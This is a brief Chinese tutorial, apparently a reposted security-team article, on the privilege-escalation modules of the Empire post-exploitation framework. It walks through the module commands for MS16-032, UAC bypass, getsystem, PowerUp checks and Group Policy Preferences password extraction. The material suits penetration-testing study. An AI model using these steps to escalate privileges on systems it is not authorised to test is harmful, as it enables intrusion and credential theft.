Empire提权模块基本都在usemodule privesc/模块下
一、溢出漏洞模块:
Empire自带了MS16-032、MS16-135(不稳定)
usemodule privesc/ms16-032
set Listener <监听器名称>
execute
二、bypass UAC:
①bypassuac
usemodule privesc/bypassuac
set Listener <监听器名称>
execute
提权成功会返回一个高权限的agents会话
或者直接进入某个agents,执行:
bypassuac <监听器名称>
②bypassuac_wscript(只适用于windows7)
usemodule privesc/bypassuac_wscript
set Listener <监听器名称>
execute
提权成功会返回一个高权限的agents会话
直接执行getsystem就可以提权成功
usemodule privesc/getsystem*
可以看到现在的权限已经是system了。
三、Powerup模块:
Empire直接集成了powerup脚本,直接调用相关模块即可
usemodule privesc/powerup/ #tab键列出模块
①allchecks
usemodule privesc/powerup/allchecks
execute
根据AbuseFunction给出的利用方式进行利用即可,关于powerup在这不过多讲述,参考一下网上师傅们优秀的文章就好。
四、GPP组策略首选项提权模块:
usemodule privesc/gpp
execute
有组策略的话就会返回xml文件中的账号密码,然后再进行后续利用即可。
点个赞和在看吧,欢迎转发!
点个赞和在看吧,欢迎转发!
点个赞和在看吧,欢迎转发!
本文始发于微信公众号(灼剑安全团队):Empire|04 Empire提权模块
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论